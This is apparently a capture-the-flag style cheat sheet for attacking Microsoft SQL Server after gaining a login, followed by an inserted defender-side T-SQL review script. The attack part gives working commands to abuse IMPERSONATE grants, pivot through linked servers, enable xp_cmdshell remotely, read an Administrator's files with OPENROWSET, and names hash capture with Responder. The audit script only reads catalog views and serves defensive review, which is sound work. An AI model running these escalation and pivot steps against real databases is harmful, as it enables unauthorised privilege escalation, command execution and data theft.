If you get an initial login on MSSQL, here’s what you do:
- Remember to type go after each batch below to send it to the server.
Determine if you can impersonate anyone
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Impersonate
EXECUTE AS LOGIN = 'FOUND_USER';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
Find Linked Databases
SELECT srvname, isremote FROM sysservers
Determine who has sysadmin rights on the linked database
EXEC ('SELECT sp.name AS SysAdminName FROM sys.server_principals sp JOIN sys.server_role_members srm ON sp.principal_id = srm.member_principal_id JOIN sys.server_principals rp ON srm.role_principal_id = rp.principal_id WHERE rp.name = ''sysadmin''') AT [LOCAL.TEST.LINKED.SRV];
Impersonate those sysadmins on the linked databases
EXEC ('EXECUTE AS LOGIN = ''SOME_ADMIN''; SELECT USER_NAME();') AT [LOCAL.TEST.LINKED.SRV];
XP_CMDSHELL
- NOTE: LOCAL.TEST.LINKED.SRV is the name of a linked database found earlier
EXEC [LOCAL.TEST.LINKED.SRV].master.dbo.sp_configure 'show advanced options', 1
EXEC ('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
EXECUTE sp_configure 'xp_cmdshell', 1
go
Reconfigure
go
NOTE:
- You can always EXEC ('SOMECOMMAND;SOMEOTHERCOMMAND;') AT [SOME_DATABASE]
Read Files
EXEC ('SELECT * FROM OPENROWSET(BULK ''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV];
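Defender-side review, added here and not part of the original notes: one T-SQL script that lists the grants and settings the steps above depend on (server-level IMPERSONATE grants, linked-server login mappings and RPC-out, and the xp_cmdshell family of options) from the system catalog views, so an administrator can confirm each one is intended. It assumes it is run by a sysadmin directly on the instance.

```sql
-- Added review script (not from the original notes). Each section maps to one
-- step of the cheat sheet above; nothing here changes configuration.

-- 1. Server-level IMPERSONATE grants: which login may EXECUTE AS which.
--    For a permission on a login, major_id is the impersonated principal.
SELECT grantee.name AS grantee_login,
       target.name  AS impersonated_login,
       p.state_desc
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL';

-- 2. Linked servers and outbound login mapping. EXEC (...) AT needs RPC out;
--    a row with uses_self_credential = 0 and a remote_name means the local
--    login shown (or every login, when local_principal_id = 0) reaches the
--    remote instance as that fixed account, regardless of its own rights.
SELECT s.name AS linked_server,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       CASE WHEN ll.server_id IS NULL        THEN '<no mapping>'
            WHEN ll.local_principal_id = 0   THEN '<all logins>'
            ELSE lp.name END                 AS local_login,
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;

-- 3. Instance options that extend SQL access to the OS or file system.
--    value_in_use = 1 means the feature is live now; value = 1 with
--    value_in_use = 0 means it was set but RECONFIGURE has not run yet.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ad Hoc Distributed Queries',
               'Ole Automation Procedures');
```

Run the same three queries on each linked server listed by section 2, since a permissive mapping on one hop is what makes the remote sysadmin steps above work.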
Force hash dumps to responder